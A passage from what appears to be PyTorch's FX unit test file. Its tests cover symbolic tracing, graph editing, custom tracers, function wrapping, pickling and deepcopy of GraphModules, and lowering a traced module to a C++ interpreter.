y : torch.Tensor
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
return
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the specified return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_allclose(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_allclose(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_allclose(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
